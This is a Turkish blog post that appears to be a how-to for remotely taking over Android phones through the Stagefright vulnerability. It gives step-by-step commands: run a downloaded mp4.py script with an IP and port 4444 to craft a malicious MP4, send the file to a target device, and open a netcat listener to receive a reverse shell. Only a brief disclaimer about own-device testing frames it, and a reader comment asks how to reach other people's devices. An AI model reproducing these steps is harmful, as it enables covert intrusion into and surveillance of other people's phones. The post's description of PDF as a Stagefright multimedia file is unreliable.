Stagefright Açığını Kullanarak Android Cihazları Kontrol edin

Yazar:
Kadir Halil Karakaş
-
2
1237

Stagefright açığını kullanarak Android Cihazınızı kontrol etmek istiyorsanız bu yazı tam size göre.

Not: Bu açık Linux üzerinde denenmiştir ve çalışıyordur Windows ve Mac üzerinde çalışılabilirliği hakkında bir bilgimiz bulunmamaktadır.

Stagefright açığı kullanılarak Android Cihazları uzaktan kontrol etmek (fotoğraf, video çekmek vb) mümkün peki nedir bu Stagefrigt?

index

Stagefright güvenlik açığı ilk olarak Zimperium Labs mobil güvenlik uzmanı Joshua Drake tarafından fark edildi. Bu güvenlik açığı, Android işletim sistemindeki PDF gibi multimedya dosyalarının çalışması ve yönetilmesinde kullanılan Stagefright isimli bileşenden kaynaklanıyor ve hemen hemen bütün Android versiyonlarını etkileyebiliyor.

Bu açığı kullanmak için ilk önce cihazınızın Stagefright açığından etkilenip etkilenmediğini öğrenmeniz gerekiyor. Öğrenmek için Google Play Store üzerinden Stagefright Detector uygulamasını indirin ve testi yapın. Testin çoğu ve ya tamamı yeşil çıktı ise Cİhazınız Stagefright açığından korunmuş demektir, kırmızı satırlar var ise maalesef cihazınız Stagefright açığına karşı korunmasız demektir.

Not: Bu açığı yalnızca kendi cihazlarınızda test amaçlı kullanınız. Başkalarına ait cihazlarda bu tekniğin kullanılması yasa dışı olabilir ve bu konuda Tekno Bölge ekibi, yönetim ve yazarları sorumluluk kabul etmemektedir.

Stagefright açığının kullanımı:

  1. Buradan gerekli olan mp4.py dosyasını indirin
  2. Ctrl+Alt+T Tuşlarına basarak Uçbirimi açın
  3. Python paketi yüklü değilse sudo apt-get install python komutu ile yükleyin
  4. python mp4.py -p local-ip -p 4444 komutunda local-ip yi kendi ip niz ile değiştirin. (Kendi İp adresinizi Uçbirime ifconfig komutunu girerek bulabilirsiniz)
  5. Bu komut AjayKulal.mp4 adında bir dosya oluşturacaktır, bu dosyayı test etmek istediğiniz cihaza gönderin
  6. Bu .mp4 dosyasını cihaza gönderdikten sonra Uçbirimde netcat -l -p 4444 yazarak dinleyiciyi başlatın.

İşlemler tamamlanmıştır. Android Cihazınızı Stagefright açığını kullanarak kontrol edebildiniz mi ?

İLGİLİ İÇERİKLERYAZARIN DİĞER İÇERİKLERİ

2 YORUM

  1. Local ip yerine 192.168.*.* yazıyoruzya biz bunu başka birisine attıgımızda nasıl bağlanacak ki

    Normal modem ip si yazılması gerekmiyormu

YORUM YAP

Yorumunuzu giriniz
İsminizi giriniz